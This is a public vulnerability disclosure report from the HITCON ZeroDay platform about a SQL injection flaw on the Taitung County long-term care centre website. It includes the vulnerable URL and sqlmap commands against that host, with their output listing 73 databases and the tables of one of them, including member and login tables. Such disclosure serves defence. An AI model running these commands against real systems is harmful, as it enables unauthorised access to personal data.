臺東縣長期照顧管理中心SQLi漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00699
  •  發信 Vendor: 臺東縣長期照顧管理中心
  • Title: 臺東縣長期照顧管理中心SQLi漏洞
  • Introduction: 此網站存在SQi漏洞

處理狀態

目前狀態

公開
Last Update : 2022/11/02
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2022/09/02 15:55:15 : 新提交 (由 百鬼夜行 更新此狀態)
  • 2022/09/02 16:32:10 : 新提交 (由 百鬼夜行 更新此狀態)
  • 2022/09/05 09:47:40 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/05 16:23:01 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/05 16:23:01 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/05 16:23:01 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/11/02 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2022-00699
  • 通報者:bpejfjsp1 (百鬼夜行)
  • 風險:中
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://ttshbltc.ttshb.gov.tw/news_view.php?bno=429

敘述

我無聊找個網站戳戳看

發現這個網站存在SQLi漏洞
詳圖
sqlmap -u https://ttshbltc.ttshb.gov.tw/news_view.php?bno=429 --dbs

圖片

圖片
available databases [73]:
[] 2cars
[] 2cars_hl
[] atp
[] bnld
[] careersdb
[] changbindb
[] changbindb-20190313
[] changbindb-old
[] chengkon_land
[] ck_light
[] cmut
[] data
[] dm_ntpehs
[] dollar_fs
[] dollar_liji
[] equaledu
[] eweb
[] fix
[] fix_2018
[] fix_junyi
[] GLphoto
[] healthy
[] hpps
[] information_schema
[] jett
[] jf_mark
[] ks_land
[] ks_township
[] light
[] livable
[] LongTermCareDB
[] loseweight
[] lottery
[] ltcare
[] mark
[] meeting_lyee
[] meeting_tgsh
[] meeting_tgsh_old
[] money
[] mountaindb
[] mysql
[] performance_schema
[] placebooking
[] purchase
[] rent
[] reservation
[] ricestore
[] rr
[] ryan
[] schoolng
[] sickweb
[] sixth
[] sixth-old
[] skmt
[] songlin
[] ssda
[] stsys
[] stsysold
[] taimali_light
[] taimaliks
[] taitung_land
[] test
[] testbnlight
[] testpage
[] tmlight
[] ttshbHR
[] va
[] vision
[] weihung
[] wordpress
[] worker
[] xfdata
[*] yzhsieh_towns

sqlmap -u https://ttshbltc.ttshb.gov.tw/news_view.php?bno=429 -D "stsys" --tables

圖片
+----------+
| member |
| ajlw |
| bj |
| doc |
| hwjk |
| jg |
| jk |
| loginREC |
| mdjk |
| mt |
| st |
| st_edit |
| sttype |
+----------+

為了秉持不看資料原則
我戳到點就好

修補建議

可以參考這個https://codertw.com/%E7%A8%8B%E5%BC%8F%E8%AA%9E%E8%A8%80/110056/

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;